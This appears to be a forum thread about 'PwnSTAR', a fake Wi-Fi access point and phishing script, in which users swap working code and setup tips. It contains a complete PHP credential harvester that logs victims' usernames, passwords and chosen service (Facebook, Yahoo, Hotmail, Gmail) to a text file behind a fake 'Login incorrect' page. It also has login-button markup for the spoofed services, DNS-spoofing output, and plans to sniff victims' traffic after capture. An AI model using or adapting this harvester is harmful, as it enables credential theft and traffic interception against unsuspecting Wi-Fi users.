Re: Soft AP / Phishing Script [Release]
VulpArgenti, thank you for your work on this script, it works very well.
I have made some changes to the html and php portions of this script and wanted to share them here.
I wanted to know which service the victim/user was trying to login with so I modified lines 37 through 40 of index.html to include name="service" on the login buttons:
Code:
<td align=center ><input type="submit" value="login" name="facebook" /></td>
<td align=center ><input type="submit" value="login" name="yahoo" /></td>
<td align=center ><input type="submit" value="login" name="hotmail" /></td>
<td align=center ><input type="submit" value="login" name="gmail" /></td>
I've made several modifications to process-form-data.php so I'll post the entire file here. I added the handling of the names of the buttons, I changed the layout of the .txt file it creates, I made it display an error and refresh back to the login page so they don't keep refreshing and adding the credentials to the file over and over, and shortened the sleep(4) to sleep(1) because 4 seemed to be too long to me (just preference maybe).
Here's the new process-form-data.php
Code:
<?php
$name = $_POST['login'];
$password = $_POST['password'];
if($_POST['facebook']){
$service = "facebook";
}elseif($_POST['yahoo']){
$service = "yahoo";
}elseif($_POST['hotmail']){
$service = "hotmail";
}elseif($_POST['gmail']){
$service = "gmail";
}
$accinfo = "login: $name\npass: $password\nservice: $service\n-----\n";
$fp = fopen("formdata.txt", "a");
fwrite($fp, $accinfo);
fclose($fp);
sleep(1);
$error =
"<html>\n" .
"<head>\n" .
"<meta http-equiv=\"Refresh\" content=\"5;url=/\" />\n" .
"</head>\n" .
"<body>\n" .
"<center><p1><b>Login incorrect.</b></p1></center>\n" .
"<center><p1>You are being redirected.</p1></center>\n" .
"</body>\n" .
"</html>";
echo $error;
//uncomment to debug $_POST variable:
//print_r($_POST);
//uncomment to list name, password, and service variables:
//echo('$name: ' . $name . '<br>$password: ' . $password . '<br>$service: ' . $service);
?>
Re: Soft AP / Phishing Script [Release]
Quote:
#resize -s 38 85 &> /dev/null # resize the terminal
commented out because it really f*cks up the resize
I've now tested this and it looks as though this is a KDE problem (I see the colours are not great either). I'm not really interested in exploring KDE so for the moment KDE users should comment out this line, and I'll either fix it or remove it from the next release.
Re: Soft AP / Phishing Script [Release]
Had to remove the resizing and colouring it messed up on KDE.
Otherwise looks good, get a few errors like no such thing as dhcp3.
The login page simply lets you login once you press "Login" even if you dont enter credentials, pretty annoying.
Re: Soft AP / Phishing Script [Release]
@devi1,
Great contribution - nice to see the open-source community in action.
Two questions:
1. Can you amend the php to allow the victim to continue on to browse, once they have entered credentials? Something like:
Code:
if [no credentials entered], then error function (same as you have now)
else [credentials entered], echo "Thank you. Refresh browser to continue browsing"
I can look at coding iptables to support this, and have PwnSTAR sniff their activities.
2. Can I put your php up on the googlecode page (with full accreditation of course)?
Regards
Vulpi
Re: Soft AP / Phishing Script [Release]
@Vulpi,
1. I was thinking of this and was not too sure how to go about doing that, if I can figure it out i'd definitely impliment this. Someone else with more experience may get to it first.
2. If you like what I've done then feel free to include it in the project.
Re: Soft AP / Phishing Script [Release]
I found this page with information on setting up a captive portal with iptables and php: http://www.andybev.com/index.php/Usi...captive_portal
it looks like it would be fairly simple to add this to your script. This may also require adding some kind of setup script that creates the rmtrack file and modifies the sudoers file to allow apache to modify iptables.
Re: Soft AP / Phishing Script [Release]
It seems php is similar to bash: this does the job;
PHP Code:
if(($password == "") || ($name == "")){
echo $error;
}else{ echo $success;
}
---------------------------------------------------------------
Quote:
captive portal... fairly simple to add this to your script
We'll see how simple!!:rolleyes:
Riferimento: Re: Soft AP / Phishing Script [Release]
hello VulpiArgenti, thank you for your advices, but that's exactly how i am configuring everything. anyway i suppose my problem resides in the dhcp...the victim connects to the fake ap but there is no transmission of data at all (checking the victim pc i have only trasmitted packets victim->fake , and 0 received. i tried with purging and reinstalling the whole dhcp3 via apt, (no result), and then trying on a fresh bt5r2 gnome 64 , and nothing yet. i am using an alfa awus036nh as fake ap, so i don't think the problem could be the receiver (you have the same one if i recall correctly :P) . could i provide more informations? just tell me, right now i'm very curious to discover the real problem! thanks!
Quote:
Originally Posted by
VulpiArgenti
Hi bugme,
Thanks for your comments - much appreciated.
Regarding the Eterm colours, you can see on the screenshot that they should be a very readable purple/yellow. Please launch Eterm then adjust the background settings: transparency off, pixmap none; then "save theme settings". This gives a blank background to show the script colours.
You shouldn't need to create any additional directories once you have moved "hotspot" into /var/www. Your directory setup should look like this:
Code:
root@bt:~# ls /var/www
hotspot index.html wstool
root@bt:~# ls /var/www/hotspot
facebookLogo.jpg GmailLogo.png HotmailLogo.png process-form-data.php
formdata.txt GoogleWifi.jpg index.html yahoo.gif
And then running the script (red is your entries):
Code:
Setting up the web page
MUST have directory structure set up correctly
Available web directories:
hotspot
index.html
wstool
Select directory
hotspot
hotspot/index moved into position
Starting Apache...
* Starting web server apache2 [ OK ]
...success
Starting DNS spoofing...
Do you want to tail the credentials txtfile? (y/n)
y
facebookLogo.jpg GmailLogo.png HotmailLogo.png process-form-data.php
formdata.txt GoogleWifi.jpg index.html yahoo.gif
Enter name of txtfile
formdata.txt
Web Server attack running
Try again with it set up like this.
If there are still problems we need to troubleshoot your victim's connection. Does a lease show up in the "DHCP Tail" eterm, and does the DNSSpoof eterm show activity?
Re: Riferimento: Re: Soft AP / Phishing Script [Release]
Quote:
Does a lease show up in the "DHCP Tail" eterm, and does the DNSSpoof eterm show activity?
Hi bugme, would you copy and post the contents of these 2 eterms, after your victim has associated?
Re: Soft AP / Phishing Script [Release]
[Update]
Version 0.51 out:
- Improved navigation and trapping (thanks snafu777 for the motivation)
- Recognises KDE, doesn't attempt resize
- Changed background to black (better in KDE)
- Made input technique more obvious (thanks nivong)
- Improved error handling
- Various minor bugfixes
- Added option of stopping dnsspoof to allow internet access once credentials are harvested. Note this must be done manually.
- Improved hotspot php (with assistance from devi1). Can no longer bypass the login page.
Please READ THE SCRIPT, it contains a lot of comments (and should help you understand the mechanics of these simple attacks, as well as learn basic bash coding).
I also forgot to mention in my initial post that the comments section of the script contains acknowledgement of other scripts I looked at (and I recommend you do the same).
Meet the new improved PwnSTAR at: http://code.google.com/p/pwn-star/downloads/list
[Coming next - a functional captive portal page with multi-client handling (Hopefully. Maybe)]
